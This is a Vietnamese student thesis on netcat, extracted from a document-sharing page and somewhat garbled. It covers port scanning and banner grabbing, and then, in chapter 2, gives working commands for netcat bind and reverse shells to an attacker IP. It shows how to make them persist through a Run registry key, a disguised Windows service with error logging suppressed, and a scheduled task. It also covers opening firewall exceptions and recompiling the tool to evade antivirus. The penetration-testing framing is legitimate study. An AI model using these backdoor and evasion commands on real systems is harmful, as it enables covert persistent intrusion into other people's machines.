Phương pháp sử dụng netcat powertool cho phép xâm nhập vào hệ thống mạng máy tính một cách đơn giản và an toàn

42 763 0
Phương pháp sử dụng netcat powertool cho phép xâm nhập vào hệ thống mạng máy tính một cách đơn giản và an toàn

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG MỤC LỤC MỤC LỤC i LỜI CẢM ƠN iv KÍ HIỆU CÁC CỤM TỪ VIẾT TẮT v DANH MỤC CÁC HÌNH VẼ vi MỞ ĐẦU .1 Lý chọn đề tài Mục đích nghiên cứu .1 Đối tượng phạm vi nghiên cứu Phương pháp nghiên cứu Ý nghĩa khoa học thực tiễn đề tài .1 CHƯƠNG : GIỚI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT 1.2Xác nhận cài đặt Netcat .2 Figure 1.1 Netcat Installed in Windows 1.3 Phương thức hoạt động Figure 1.2 Starting Netcat in Client Mode (Windows to Windows) Figure 1.3 Starting Netcat in Client Mode (Windows to Windows) Figure 1.4 Starting Netcat in Client Mode (Windows to Linux) .4 Figure 1.5 Netcat with the –n Option Figure 1.6 Netcat without the –n Option 1.4 Công cụ redirector 1.5 Giao diện trò chuyện đơn giản Figure 1.7 Sending Data Across a Connection 1.6 Port Scanning Figure 1.8 Port Scanning with Netcat .9 1.7 Chuyển tập tin (Transferring Files) 1.8 Banner Grabbing Figure 1.9 SSH Banner Grabbing with Netcat .10 Figure 1.10 HTTP Banner Grabbing With Netcat 11 1.9 Máy chủ Web (HTTP) 12 Figure 1.11 HTTP Banner Grabbing with GET 13 i GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG Figure 1.12 HTTP Banner Grabbing with HEAD 14 1.10 Máy chủ E-mail .14 1.11Tóm lược 15 1.12 Giải pháp Fast Track 15 1.12.1 Sự giới thiệu .15 1.12.2 Cài đặt 15 1.13 Hoạt động 16 CHƯƠNG NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM 17 2.1 Netcat .17 2.2 Sử dụng Netcat Port Scanner .17 Figure 2.1 A TCP Port Scan 17 2.3 Banner Grabbing .18 Figure 2.2 A Requre HTTP HEAD / App Netcat 18 2.4 Dịch vụ nhận dạng 19 Figure 2.3 Identifying an Unknown Service using Netcat .19 2.5 Tránh Windows XP /Windows 2003 Server Firewall 19 Figure 2.4 Windows Security notice triggered by Windows Firewall 20 2.5.1 Làm Firewallngoại lệ sử dụng lệnh Netsh 20 2.5.1 Xác định trạng thái Firewall 20 Figure 2.5 Netsh Firewall Show Opmode Command .21 Figure 2.6 Shows the Windows Firewall Exception we Created 22 2.6 Tạo Netcat Backdoor Windows XP Windows 2003 Server 22 2.7 Phương thức kết nối Backdoor 23 2.8 Khởi tạo kết nối trực tiếp đến Backdoor 23 Figure 2.7 Direct Connection to Backdoor .23 2.9 Khởi tạo kết nối từ Backdoor .24 Figure 2.8 Connection from the Backdoor 24 2.10 Phương pháp thực hành Backdoor 25 Figure 2.9 Creating a Backdoor using a Registry Entry 25 Figure 2.10 Windows Backdoor Shell .26 2.11 Thực Backdoor sử dụng dịch vụ Windows 26 Figure 2.11 Creating the Windows Service Backdoor 27 Figure 2.12 Starting the Netcat Backdoor using a Windows Service 28 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 ii KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG 2.12 Thực Backdoor sử dụng Windows Task Scheduler 28 Figure 2.13 Starting the Task Scheduler Service 28 Figure 2.14 Scheduling the Backdoor .29 2.13 Tóm tắt Execution Backdoor 29 2.14 Tóm lược 30 2.14.1 Giải pháp Fast Track 30 2.14.2 Thử nghiệm Egress Firewall .31 2.14.3 Tránh phát hệ thống Windows 31 2.14.4 Tạo Netcat Backdoor trênWindows XP Windows 2003 Server 31 CHƯƠNG HƯỚNG PHÁT TRIỂN CỦA NETCAT 32 Figure 3.1 Use netcut to check access 32 Figure 3.2 Use netcut to cut network access 33 KẾT LUẬN .34 DANH MỤC TÀI LIỆU THAM KHẢO 35 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 iii KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG LỜI CẢM ƠN Trên thực tế thành công mà không gắn liền với hỗ trợ, giúp đỡ dù hay nhiều, dù trực tiếp hay gián tiếp người khác Trong suốt thời gian từ bắt đầu học tập giảng đường đại học đến nay, em nhận nhiều quan tâm, giúp đỡ quý Thầy cô, gia đình, bạn bè Với lòng biết ơn sâu sắc nhất, em xin gửi đến quý Thầy cô Khoa Công Nghệ Thông Tin – Trường Đại học Hải Phòng với tri thức tâm huyết để truyền đạt vốn kiến thức quý báu cho chúng em suốt thời gian học tập trường Em xin chân thành cảm ơn Thạc Sỹ Đào Ngọc Tú tận tâm hướng dẫn chúng em qua buổi học lớp buổi nói chuyện, thảo luận lĩnh vực mạng máy mạng Nếu lời hướng dẫn, dạy bảo thầy em nghĩ bải Luận án em khó hoàn thiện Một lần nữa, em xin chân thành cảm ơn thầy Luận án thực khoảng thời gian gần tuần Bước đầu vào thực tế, tìm hiểu lĩnh vực hack mạng máy tính, kiến thức em hạn chế nhiều bỡ ngỡ Do vậy, không tránh khỏi thiếu sót điều chắn, em mong nhận ý kiến đóng góp quý báu quý thầy cô bạn học lớp để kiến thức em lĩnh vực mạng máy tính hoàn thiện Hải Phòng, tháng 05 năm 2016 Sinh viên Nguyễn Thị Khuyên GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 iv KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG KÍ HIỆU CÁC CỤM TỪ VIẾT TẮT TCP : Transmission Control Protocol IP (Internet Protocol) : Giao thức Liên mạng NC NETCAT : Công Cụ Hack Netcat OPTION : Lựa Chọn IDS : Hệ thống phát xâm nhập IPS : Hệ thống phòng chống xâm nhập SYN : Cổng Quét Syn HTTP (HyperText Transfer Protocol) : Giao thức truyền tải siêu văn Figure GVHD: ThS Đào Ngọc Tú : Hình SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 v KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG DANH MỤC CÁC HÌNH VẼ Figure 1.1 Netcat Installed in Windows Figure 1.2 Starting Netcat in Client Mode (Windows to Windows) Figure 1.3 Starting Netcat in Client Mode (Windows to Windows) Figure 1.4 Starting Netcat in Client Mode (Windows to Linux) .4 Figure 1.5 Netcat with the –n Option Figure 1.6 Netcat without the –n Option Figure 1.7 Sending Data Across a Connection Figure 1.8 Port Scanning with Netcat .9 Figure 1.9 SSH Banner Grabbing with Netcat .10 Figure 1.10 HTTP Banner Grabbing With Netcat 11 Figure 1.11 HTTP Banner Grabbing with GET 13 Figure 1.12 HTTP Banner Grabbing with HEAD 14 Figure 2.1 A TCP Port Scan 17 Figure 2.2 A Requre HTTP HEAD / App Netcat 18 Figure 2.3 Identifying an Unknown Service using Netcat .19 Figure 2.4 Windows Security notice triggered by Windows Firewall 20 Figure 2.5 Netsh Firewall Show Opmode Command .21 Figure 2.6 Shows the Windows Firewall Exception we Created 22 Figure 2.7 Direct Connection to Backdoor .23 Figure 2.8 Connection from the Backdoor 24 Figure 2.9 Creating a Backdoor using a Registry Entry 25 Figure 2.10 Windows Backdoor Shell .26 Figure 2.11 Creating the Windows Service Backdoor 27 Figure 2.12 Starting the Netcat Backdoor using a Windows Service 28 Figure 2.13 Starting the Task Scheduler Service 28 Figure 2.14 Scheduling the Backdoor .29 Figure 3.1 Use netcut to check access 32 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 vi KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG Figure 3.2 Use netcut to cut network access 33 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 vii KHOA CÔNG NGHỆ THÔNG TIN – TRƯỜNG ĐẠI HỌC HẢI PHÒNG MỞ ĐẦU Lý chọn đề tài Cùng với bùng nổ thông tin đời nhiều phần mềm tiếng, trang web chuyên nghiệp bảo mật liệu thật cần thiết Một trang web muốn phát triển bền vững cần phải có cấu bảo mật vững chắc, an toàn liệu thiếu Vì suốt trình nghiên cứu tìm tòi, em chọn cho đề tài mà em nghĩ thiết yếu cho muốn tìm hiểu hack, đề tài không xa lạ với theo ngành tin học, cần quan tâm Mục đích nghiên cứu Tìm hiểu Netcat, cách sử dụng Thử nghiệm netcat thực tế ứng dụng Đối tượng phạm vi nghiên cứu Nghiên cứu cách thức sử dụng mục đích sử dụng Netcat Nghiên cứu triển khai Netcat với ứng dụng thực tế Phương pháp nghiên cứu Tìm hiểu tài liệu liên quan Netcat tình thử nghiệm Netcat Triển khai phát triển Netcat môi trường giả lập sử dụng phần mềm Vmware Ý nghĩa khoa học thực tiễn đề tài Phương pháp sử dụng Netcat powertool cho phép xâm nhập vào hệ thống mạng máy tính cách đơn giản an toàn GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 NETCAT POWER TOOL CHƯƠNG 1: GIỞI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT CHƯƠNG : GIỚI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT 1.1 Lịch sử Netcat Được phát hành vào năm 1996, Netcat chương trình mạng thiết kế để đọc ghi liệu hai Transmission Control Protocol TCP kết nối User Datagram Protocol (UDP) cách sử dụng giao thức TCP / Protocol Internet (IP) Netcat thường nhắc đến mộttiện ích "con dao quân đội Thụy Sĩ" Chức Netcat hữu ích chương trình độc lập công cụ back-end loạt ứng dụng Một số sử dụng nhiều Netcat bao gồm scanning, transferring files, grabbing banners, port listening chuyển hướng, nhiều ứng dụng nefariously , backdoor Nguyên mã hoá cho UNIX, ban đầu không trì cách thường xuyên, Netcat viết lại thành số phiên triển khai thực Nó chuyển đến số hệ điều hành, thường thấy phân phối khác Linux Microsoft Windows 1.2 Xác nhận cài đặt Netcat Để xác nhận Netcat cài đặt cách xác, gõ nc -h lànetcat -h để hiển thị hình giúp đỡ (xem hình 1.1 1.2) Trong phiên Windows, - L đại diện cho chế độ nghe liên tục (được mô tả sau), đại diện cho chế độ pine(|) phiên Linux Ngoài ra, phiên Linux bao gồm-V hiển thị thông tin phiên Phiên Linux bao gồm-x (Hexdump chuyển dịch vào ra), mà không bao gồm phiên Windows, gợi ý trong-o option GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 NETCAT POWER TOOL CHƯƠNG 1: GIỞI THIỆU VỀ NETCAT VÀ CÁC HOẠT ĐỘNG CƠ BẢN CỦA NETCAT Figure 1.1 Netcat Installed in Windows 1.3 Phương thức hoạt động Netcat có hai chế độ hoạt động chính:khách hàng, máy chủ Hai dòng hình giúp đỡ hình 1.2 (bên thông tin phiên bản) giải thích cú pháp thích hợp chế độ: connect to somewhere: nc [-options] hostname port[s] [ports] … listen for inbound: nc –l –p port [options] [hostname] [port] GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Netsh firewall show opmode Nếu nhìn vào hình 2.5, thấy kết lệnh netsh Figure 2.5 Netsh Firewall Show Opmode Command Nhìn vào cấu hình profile Domain (hiện hành) cài đặt, quan tâm đến cài đặt chế độ hoạt động chế độ ngoại lệ Trong ví dụ thiết lập cấu hình như: Operation mode = Enable Exception mode = Enable Thiết lập chế độ hoạt động thiết lập để Kích hoạt, có nghĩa tường lửa bật chặn kết nối đến Thiết lập chế độ ngoại lệ thiết lập để Kích hoạt tính năng, mà cho biết tường lửa cửa sổ cấu hình phép ngoại lệ tường lửa cửa sổ Tùy chọn quan trọng cho phép thêm ngoại lệ cho cổng lắng nghe Netcat Nếu lệnh netsh báo cáo chế độ ngoại lệ vô hiệu hóa, tường lửa không cho phép trường hợp ngoại lệ Trong trường hợp này, cấu hình tường lửa phép ngoại lệ với lệnh sau Netsh firewall set opmode mode = enable exceptions = enable profile = all Sau xác minh thiết lập tường lửa cấu hình phép trường hợp ngoại lệ, làm cho ngoại lệ cho người nghe Netcat Trong ví dụ sau, thêm ngoại lệ cho tường lửa Windows phép người nghe chấp nhận kết nối gửi đến không kích hoạt cảnh báo Windows Netcat listener lắng nghe TCP / 1234 Sử dụng lệnh sau bổ sung thêm cổng TCP 1234 vào danh sách ngoại lệ định nghĩa tên GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 21 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT ngoại lệ netsh firewall add portopening TCP 1234 “Windows Firewall Reporting Agent” enable all Khi lệnh thành công, bổ sung thêm định nghĩa cổng bạn vào danh sách tường lửa ngoại lệ cách sử dụng giao thức, số cổng, tên bạn xác định lệnh trước Bạn xác minh quy tắc thêm vào tường lửa cách sử dụng lệnh,netsh firewall show port opening, thể hình 2.6 Figure 2.6 Shows the Windows Firewall Exception we Created Tại thời điểm này, bắt đầu nghe Netcat cổng TCP 1234 tránh bị chặn tường lửa Windows tránh thông điệp cảnh báo Windows 2.6 Tạo Netcat Backdoor Windows XP Windows 2003 Server Netcat công cụ đa thực vô số chức giao thức TCP / IP Một tính hữu ích, đặc biệt kiểm tra xâm nhập, khả tiện ích từ hệ thống khác Trong phần này, sử dụng tính để truy cập vào backdoor từ xa hệ thống Windows XP Một backdoor kênh truyền thông cung cấp shell lệnh từ xa hệ thống khai thác trước (nạn nhân), cho phép truy cập vào hệ thống thời gian sau Trong phần này, chứng minh cách khác để sử dụng tạo backdoor máy chủ nạn nhân Windows XP Để minh chứng, phần này, tiếp tục sử dụng netcat nc.exe GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 22 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT 2.7 Phương thức kết nối Backdoor Chúng có hai phương pháp mà sử dụng để cung cấp kênh thông tin liên lạc để backdoor Netcat Hoặc thiết lập kết nối trực tiếp đến backdoor từ hệ thống công chúng tôi, có backdoor đầu kết nối đến người biết lắng nghe hệ thống công 2.8 Khởi tạo kết nối trực tiếp đến Backdoor Phương thức kết nối truy cập backdoor thực Netcat chế độ daemon lắng nghe kết nối đến Một backdoor lắng nghe cho kết nối đến, khởi tạo kết nối từ hệ thống công Sau kết nối thiết lập hệ thống công nạn nhân, dòng lệnh từ xa cung cấp cho hệ thống công Sơ đồ cho thấy phương thức kết nối Figure 2.7 Direct Connection to Backdoor Để thiết lập kịch này, cần phải hiểu lệnh thực nạn nhân để tạo kênh backdoor Các Netcat lệnh mà muốn thực hệ thống khai thác (chủ nhà nạn nhân) cách sử dụng phương pháp nghe là: c: \ nc.exe -d -L -p 1234 -e cmd.exe Netcat Options Action –d –L –p 1234 Tách từ giao diện điều khiển, chế độ Nghe khó, nghe lại ổ cắm gần Số cổng địa phương –e cmd.exe Chương trình Inboundđể thục (lệnh Windows) GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 23 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Lợi ích phương pháp Một lợi ích phương pháp kết nối này, lệnh thực thi, bạn kết nối với lúc bạn muốn nhiều lần bạn muốn Nhược điểm Phương pháp Một số nhược điểm với phương pháp kết nối rằng, lệnh thực thi,bất kỳ kết nối với lúc họ muốn Phương thức kết nối để lại backdoor mở cho phép tùy ý truy cập hệ thống cấp cho người khác Ngoài ra, có thiết bị lọc gói nạn nhân hệ thống công, bạn khả để thực kết nối cho người nghe Trong mục tiêu phải có backdoor vào hệ thống máy chủ nạn nhân, không muốn để giảm an toàn hệ thống cung cấp backdoor vào hệ thống cho người khác sử dụng 2.9 Khởi tạo kết nối từ Backdoor Phương pháp thứ hai phổ biến để truy cập vào backdoor, phải có nạn nhân đầu kết nối đến hệ thống công Trong ví dụ này, hệ thống công sử dụng Netcat chế độ lắng nghe Các nạn nhân tạo kết nối đến hệ thống công cổng xác định gửi lệnh shell Hình 2.8 cho thấy phương thức kết nối Figure 2.8 Connection from the Backdoor Các câu lệnh muốn nạn nhân để chạy để sử dụng phương pháp sau: Netcat Options –d Action Tách từ giao diện điều khiển, chế độ Host Điểm đến IP / máy chủ để kết nối 1234 Số cổng đến để kết nối –e cmd.exe GVHD: ThS Đào Ngọc Tú Program to execute (Windows command shell) SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 24 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Một backdoor thực thi, Windows shell lệnh gửi đến người nghe hệ thống công, với đặc quyền người sử dụng backdoor cấu hình để chạy theo Lợi ích phương pháp kết nối Sử dụng phương pháp này, kết nối Netcat qua thông qua thiết bị lọc gói (Windows Firewall), trừ lọc bên đặt ngăn chặn cổng mà bạn sử dụng để tạo kết nối bên Để tránh điều này, bạn sử dụng kỹ thuật Egress Firewall quét để tìm cổng outbound mở để sử dụng cho kết nối bạn Nhược điểm Phương pháp Một nhược điểm với phương pháp kết nối là, phải chờ kiện (Task Scheduler) hành động định hướng người dùng (các ghi vào hệ thống khởi động lại máy tính) gây nên lệnh backdoor để kết nối với người nghe Netcat vào hệ thống công 2.10 Phương pháp thực hành Backdoor Phương pháp mà sử dụng để kích hoạt kết nối backdoor thêm lệnh Netcat cho Windows registry Các vị trí cụ thể registry mà muốn nhắm mục tiêu kích hoạt lệnh Netcat người dùng đăng nhập vào hệ thống Giả sử bạn có hệ thống truy cập cấp cho nạn nhân, bạn thêm khóa registry từ vỏ nhắc lệnh / hệ thống cách sử dụng lệnh sau đây:c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe” Figure 2.9 Creating a Backdoor using a Registry Entry GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 25 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Bây thời gian tới người dùng đăng nhập vào hệ thống, lệnh backdoor Netcat kích hoạt gửi dấu nhắc lệnh để công hệ thống Như thể hình 2.15, quản trị viên miền đăng nhập vào hệ thống nạn nhân kích hoạt backdoor, mà cho dấu nhắc lệnh Windows Figure 2.10 Windows Backdoor Shell Lợi ích phương pháp Khi backdoor thực sau người dùng đăng để nạn nhân, shell lệnh thực với đặc quyền người dùng Phương pháp có thể cung cấp cho vỏ dùng tên miền đặc quyền Nhược điểm Phương pháp Nếu từ backdoor sử dụng nó, phải chờ đợi cho người sử dụng để log off hệ thống đăng nhập trở lại để kích hoạt kết nối backdoor 2.11 Thực Backdoor sử dụng dịch vụ Windows Netcat không thiết kế để có dịch vụ Windows, tạo dịch vụ có sử dụng lệnh Netcat để gửi cửa sổ command prompt vào hệ thống công Sử dụng công cụ SC Windows tạo dịch vụ để thực lệnh Netcat SC dòng lệnh cửa sổ công cụ sử dụng để giao tiếp với điều khiển dịch vụ Dịch vụ NT Để chứng minh, tạo dịch vụ cách sử dụng lệnh sau đây.sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 26 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Nhìn vàosc lệnh nên lưu ý vài lựa chọn Đối với ví dụ này, đặt tên cho dịch vụ "ncbackdoor" dành cho mục đích trình diễn Đó ý tưởng tốt để tạo tên dịch vụ tối nghĩa để trộn với dịch vụ Widows khác Một ví dụ tên dịch vụ backdoor tốt " Network Connections Driver Service" Một lựa chọn quan trọng chúng tôisc tạo lệnh lựa chọn start = auto , điều nói với điều khiển dịch vụ để tự động bắt đầu dịch vụ vào Boot Ngoài error= ignore tùy chọn đạo điều khiển dịch vụ không gửi lỗi tới ghi kiện hệ thống Figure 2.11 Creating the Windows Service Backdoor Bởi Netcat không thiết kế để chạy dịch vụ, phải sử dụng lệnh cmd / K start để chạy lệnh Netcat dấu nhắc lệnh Một dịch vụ tạo thành công, bạn thử nghiệm dịch vụ để đảm bảo hoạt động lệnh net start Netcat không chứa mã để tương tác với điều khiển dịch vụ Windows, điều bạn thấy lỗi hình 2.17 Bất kể lỗi này, lệnh Netcat thực thi gửi vỏ cho hệ thống xác định bạn tạo dịch vụ Từ thời điểm này, hệ thống khởi động lại, backdoor gửi lệnh shell vào cổng nghe hệ thống công Shell lệnh bắt đầu hệ thống địa phương, người dùng đăng nhập vào hệ thống GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 27 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Figure 2.12 Starting the Netcat Backdoor using a Windows Service Lợi ích phương pháp Lợi ích việc sử dụng dịch vụ Windows để kích hoạt backdoor hệ thống khởi động lại, dịch vụ gửi lại lệnh shell để công hệ thống Không có hành động sử dụng cần thiết để kích hoạt backdoor Nhược điểm Phương pháp Nếu hệ thống máy chủ không khởi động lại thường xuyên, lệnh shell bạn bị cắt đứt, thời gian dài thực thông qua khởi động lại 2.12 Thực Backdoor sử dụng Windows Task Scheduler Chúng ta bắt đầu dịch vụ sử dụnglệnh net start schedule, thể hình 2.13 Figure 2.13 Starting the Task Scheduler Service Bây dịch vụ Task Scheduler chạy, xếp lệnh backdoor Netcat Đối với ví dụ này, chắn có kết nối từ máy chủ nạn GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 28 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT nhân hàng ngày 03:00 Sử dụng lệnh sau đây, xếp backdoor Netcat để bắt đầu kết nối đến hệ thống công gửi dấu nhắc lệnh ngày lúc 3:00 pm C:\>at 15:00:00 /every:m,t,w,th,f,s,su ““c:\nc.exe -d 192.168.1.70 1234 - e cmd.exe”” Figure 2.14 Scheduling the Backdoor Windows 15:00 ý tưởng tốt để đồng hóa thời gian nạn nhân hệ thống công với thời gian phục vụ từ xa, làm điều tay bạn cài đặt backdoor Lợi ích cho phương pháp Một lợi ích quan trọng phương pháp bạn biết xác backdoor bắt đầu kết nối trở lại với hệ thống công bạn, không cần tương tác người dùng (đăng nhập khởi động lại) để kích hoạt kết nối backdoor 2.13 Tóm tắt Execution Backdoor Mỗi phương pháp thực backdoor mô tả phần có lợi ích, tìm thời gian ngắn Bảng 2.2, so sánh phương pháp thực backdoor với hành động kết nối kiện tiềm để có miền cửa sổ quản trị shell GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 29 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT Table 2.2 Backdoor Execution Methods Execution Method Connection Action Potential to Get an Elevated Shell Nếu người dùng tên miền miền Registry Entry Khi người dùng quản trị viên đăng nhập vào hệ thống đăng nhập vào hệ cách sử dụng máy tính để bàn từ thống xathì shell sinh với quyền miền họ Windows Service Khi hệ thống Task Scheduler khởi động lại Ngày / thời gian bạn muốn Chỉ có shell Local System Chỉ có shell Local System Nhìn vào bảng 2.2, xác định ký nhập phương pháp backdoor cho hội tốt để leo thang backdoor cấp độ hệ thống Ngoài ra, phương pháp thực Task Scheduler cho lần dự đoán trước mà backdoor thiết lập kết nối cho 2.14 Tóm lược Trong suốt chương bao gồm số tính Netcat sử dụng thử nghiệm thâm nhập Trong chương này, thảo luận Netcat cổng quét nhận dạng dịch vụ khả chứng minh làm để có thông tin ứng dụng máy chủ Web Chúng thảo luận cách thức để kiểm tra xác minh quy tắc tường lửa bên ngoài, làm tránh bị phát phần mềm chống virus, Window Firewall Cuối cùng, nói chuyện kết nối backdoor thực nhiều phương pháp Netcat 2.14.1 Giải pháp Fast Track Cổng quét Dịch vụ nhận dạng - Netcat tiện ích mạnh mẽ để quét cổng, banner grabbing, xác định dịch vụ không rõ - Bạn xác định loại máy chủ Web thông tin phiên sử dụng Netcat để gửi lệnh HTTP HEAD - Tạo kịch để tự động nhận dạng banner điều cần thiết thực thử nghiệm xâm nhập chống lại hàng ngàn máy chủ Web GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 30 NETCAT POWER TOOL CHƯƠNG 2: NETCAT VÀ CÁC TÍNH NĂNG THỬ NGHIỆM CỦA NETCAT 2.14.2 Thử nghiệm Egress Firewall - Mục tiêu thử nghiệm để kiểm tra quy tắc tường lửa bên để xác minh cổng lọc làm việc cách - Hai hệ thống yêu cầu cho kiểm tra Một hệ thống nằm bên tường lửa cố gắng để làm cho kết nối thông qua tường lửa, với hệ thống bên cổng TCP UDP 2.14.3 Tránh phát hệ thống Windows - Các tường lửa Windows phát và, theo mặc định, khối chương trình từ việc mở socket TCP / IP lắng nghe kết nối đến - Bạn bỏ qua Windows Firewall chặn cảnh báo tính tay cách thêm ngoại lệ cho tường lửa - Biên dịch lại Netcat từ nguồn đảm bảo chương trình Antivirus không xác định loại bỏ khỏi hệ thống mục tiêu bạn 2.14.4 Tạo Netcat Backdoor trênWindows XP Windows 2003 Server - Hai phương pháp sử dụng để giao tiếp với backdoor Netcat chúng tôi, bắt đầu kết nối đến backdoor kích hoạt backdoor để tạo kết nối cho - Thực backdoor sử dụng Entry Registry gây nên kết nối Netcat cho người nghe người dùng đăng nhập vào hệ thống - Windows Task Scheduler Service sử dụng để gửi cho dấu nhắc lệnh Windows khoảng thời gian ngày / thời gian bạn chọn GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 31 NETCAT POWER TOOL CHƯƠNG HƯỚNG PHÁT TRIỂN CỦA NETCAT CHƯƠNG HƯỚNG PHÁT TRIỂN CỦA NETCAT NetCut công cụ trông thô sơ, cách sử dụng đơn giản, chức NetCut thực vô quan trọng Những chức kể đến kiểm tra tốc độ mạng, băng thông, thay đổi địa MAC, hay chí cắt truy cập mạng thành viên mạng LAN nào… Việc cắt truy cập mạng chức hữu ích dành cho người quản trị mạng LAN, có thành viên mạng dùng đến mức chiếm hết băng thông người khác Nhất với người quản trị mạng Wi-Fi, đặc tính không dây khiến việc kiểm soát thành viên truy cập không dễ (ngay đặt mật khẩu) Hiện NetCut lên đến phiên 2.1.4, với cải tiến đáng kể tốc độ dò mạng sửa lỗi, đồng thời tương thích với Win lẫn Win 8… Bạn lên trang chủ NetCut để tải NetCut 2.1.4 3.1 Xem danh sách truy cập Để xem danh sách truy cập riêng mạng LAN cụ thể, bấm nút Choice NetCard chọn card mạng mong muốn Lưu ý mạng Wi-Fi tên thường có cụm kiểu b/g/n wireless Figure 3.1 Use netcut to check access 3.2 Dùng NetCut cắt mạng thành viên Để cắt truy cập mạng thành viên, bạn chọn máy tính thành viên danh sách bấm nút Cut off 32 GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 NETCAT POWER TOOL CHƯƠNG HƯỚNG PHÁT TRIỂN CỦA NETCAT Figure 3.2 Use netcut to cut network access Hướng dẫn sử dụng NetCut 2.1.4: Để cắt truy cập mạng thành viên, bạn chọn máy tính thành viên danh sách bấm nút “Cut off” (nút 1) Ngoài bạn ngăn việc liên lạc máy tính A với riêng máy tính B Hãy chọn máy B bấm nút “>>" (nút 2) để NetCut coi máy B cổng GateWay, sau chọn máy A bấm Cut off (nút 1) Lý nguyên lý cắt mạng NetCut cắt liên lạc với GateWay GVHD: ThS Đào Ngọc Tú SVTH: Nguyễn Thị Khuyên Lớp CNTT Khóa K13 33 NETCAT POWER TOOL KẾT LUẬN KẾT LUẬN Netcat chương trình mạng thiết kế để đọc ghi liệu hai kết nối UDP, sử dụng giao thức IP TCP Đơn giản hơn, Netcat phiên mạng chương trình UNIXcat Trong cách mà cat đọc ghi thông tin cho file,netcat đọc ghi thông tin qua kết nối mạng Mặc dù đời công cụ tiên tiến thập kỷ qua, Netcat phổ biến người dùng cho tính đơn giản mạnh mẽ Netcat chương trình đơn giản cho phép đọc ghi liệu mạng, giống cách mà cat ghi liệu vào tập tin Netcat có sẵn hầu hết hệ thống: UNIX / Linux, Windows, BSD, Mac, người khác Linux Windows việc triển khai phổ biến Mặc dù công cụ mạnh mẽ hơn, Netcat lựa chọn phổ biến người dùng Hoạt động Netcat bao gồm giao diện chat thô sơ tập tin chuyển giao Đối với thử nghiệm thâm 